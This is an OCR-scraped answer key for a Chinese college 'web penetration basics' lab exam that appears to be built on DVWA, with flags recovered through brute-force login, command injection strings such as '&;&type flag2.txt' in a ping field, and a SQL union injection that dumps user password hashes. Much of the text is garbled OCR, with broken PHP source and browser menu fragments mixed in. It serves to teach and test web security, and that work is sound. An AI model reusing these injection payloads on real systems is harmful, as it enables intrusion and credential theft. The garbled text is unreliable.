《web渗透基础A卷答案.docx》由会员分享,可在线阅读,更多相关《web渗透基础A卷答案.docx(10页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、得分评卷人C1 命 view-source:*最常访问 巴火狐官方站点,新手上路 目常用网址E3京东商城 VOCX IICUU . x MA / Z苏州市职业大学20172018学年第二学期试卷标准答案及评分标准web基础渗透(分散 A卷开卷上机)出卷人 课题组出卷人所在学院(部)计算机工程学院使用班级16网络1一、提交flagl (每题5分,共30分,最多可以提交6个flagl) Password:input type=submit value=Login“ name=Login”)Vulnerability: Command Inj X view-source:0最常访问a火狐官方站点新手
2、上路 目常用网址JD京东商城form name=ping action= # method=postEnter an IP address:input type=submit“ name=Submit value:Submit”) G* Q G* Q view-source:*最常访问包火狐官方站点 新手上路巴常用网址圆京东商城fflagl load_up_file9page! view-source: view-source:京东商城JD*最常访问囱火狐官方站点 新手上路包常用网址User ID:l2/optionXinput type=submit“ name=Submit value=S
3、ubmit”echo ”;else / Login failedsleep( 2 );echo *Username and/or password incorrect. ;mysQl_close();)/flaglbrute_*source view-source:京东商城JD?*最常访问图火狐官方站点安新手上路 H常用网址User ID:2/ optionXopCommand Injection SourceI *?phpi sse*t sT i XuX ions = wux-zray 9 , ; = ;/ Removeany of thechai-acxairs inxHe* a.irxa
4、yCV 1 auk 1 i sx).Sta一寻 etsxx*_replace ,$ sutosx x t vix i ons,/D&t ermi ne OS and exacup e The pi rtg command.i f C sx.ri sT-r , Windows NT )/WindowsScmd =shell_exeu i.ns * St;auirset ) ; eise ( / LxScmd =stie 11_exeu、 ixns- u 4. S ,t eix-sel: ;/ / FQ dbauk ozr the end u.sex- wuho “ Scradj V/px*w ;
5、)= lag: 1(QKeua& soxixu &y8SQL Injection (Blind) Source01/ Feedback for echo Userelse (/ Feedback for echo UserSresultend user ID exists inend user ID is MISSINGThecharacterthe database. Jfrom the database.suppresseserrorsf lagl so easypage !) J :/mvsql_close();得分得分评卷人二、提交flag2 (每题10分,共20分,最多可以提交2个f
6、lag2)1 flag2 bruteVulnerability: Brute ForceLoginLoginLoginWelcome to the password protected area admin ;flag2Ox62727574654O)2、flag hello word!Vulnerability: Command InjectionPing a deviceEnter an IP address: &;&type flag2.txt: SubmitPinging 192. 168. 190. 131 with 32 bytes of data:Reply froniReply
7、fromReply fromReply from192.168.190. 131: bytes=32192.168.190. 131: bytes=32192.168.190. 131: bytes=32192. 168. 190. 131: bytes=32TTL=64TTL=64TTL=64TTL=64Ping statistics for 192.168.190. 131:Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 0
8、ms, Maximum = 0ms, Average = 0msZmxhZ3toZWxsbyB3b3JkIX0=0最常访问 B火狐官方站点 &新手上路围常用网址JD京东商城flag2:1261734558interceptforwardVulnerability: S得分评卷人optionshistorydropintercept三、提交flag3 (每题15分,共30分,最多可以提交2个flag3)1、flag3 DVWAvulnerabmlitiesVulnerability: Command InjectionPing a deviceEnter an IP address: 92.16
9、8.190.131&;&type .flag3.txt SubmitPinging 192. 168. 190. 131 with 32 bytes of data:Reply from 192.168.190. 131: bytes=32 timelms TTL=64Reply from Reply froni Reply from: bytes=32 timelms TTL=64: bytes=32 timelms TTL=64192. 168. 190. 131:bytes=32timeport 180 use SSLresponserawheadershexhtmlrender1337
10、cbr /Surname: 8d3533d75ae2c3966d7e0d4fcc69216bID: 1 union select user,password from users First name : pabloSurname: 0dl07d09f5bbe40cade3de5c71e9e9b7ID: 1 imion select user zpassword from users First name : smithySurname: 5f4dcc3b5aa765d61d8327deb882cf99ID: 1 imion select user password from users Fi
11、rst name: flagSurname: flag3:you winMore Information : / secur it earn. com/securityreviews/5DP0HlP76E .html .Wikipedia.org/wiki/SQL_injection : /f erriiJx.mavitiina. com/sql-injection-cheatsheet-oku/v 1 i=1 il II0 matches得分评卷人四、提交flag4 (每题20分,共20分,最多可以提交1个flag4)1、c:flag4.rar加压密码为“admin”密文MD5加密,解密为后
12、名为flag4 admin )9c:Documents andSettingsDocuments andSettings言藏此驱动器的内容普加/删除程序更索文件或文件夹SoftlnstDownloadsDriverProgram FilesWINDOWSxajnppeula. 1028. txt 文本文档 18 KB和文件夹任务属命名这个文件多动这个文件盘制这个文件辱这个文件发布到Web白电子邮件形式发送此 件月赊这个文件eula. 1033. txt文本文档10 KBeula. 2052. txt文本文档18 KBeula 1036.txt文本文档18 KBeula. 3082. txt 文
13、本文档 18 KBeula 1040. txt文本文档18 KBeula. 1041. txt文本文档1 KBglobdata. ini 配置设置2 KBinstall. exe External Installer Microsoft Corpor.位置戈的电脑 克的文档 专享文档UI Wrapper Resou.UI Wrapper Resou.YC_RED. MSIWindows Installe. 228 KBinstall. res. 1031.Ressourcen-DLL f.install. res. 1042.UI EHffl己仝上DLLinstall. res. 1033.9
14、 0,21022.8UI Wrapper Rtsou.install. res. 2052.用户界面包装资源install. res. 1036.9.0 21022.8UI Wrapper Resou.install, res. 3082.Archivo DLL de r .UJE E 用凶uPythonzTeula. 1031. txt 文本文档18 KBula. 1042. txt 文本文档 18 KBinstall, ini 配置设置1 KBinstall. rs. 1040.9.0.21022.8 DLL di risorse d.VU RED. cabWinRAR压缩文件 1,409 KBvcredist. bmp96 x 48BMP图像tlagA. rar hnRAR压缩文件 ;KB2、在系统桌面上flag4.rar加压码为“#3a” ,解密后明文为flag4passwordv感谢您的支持与使用如果内容侵权请联系删除仅供教学交流使用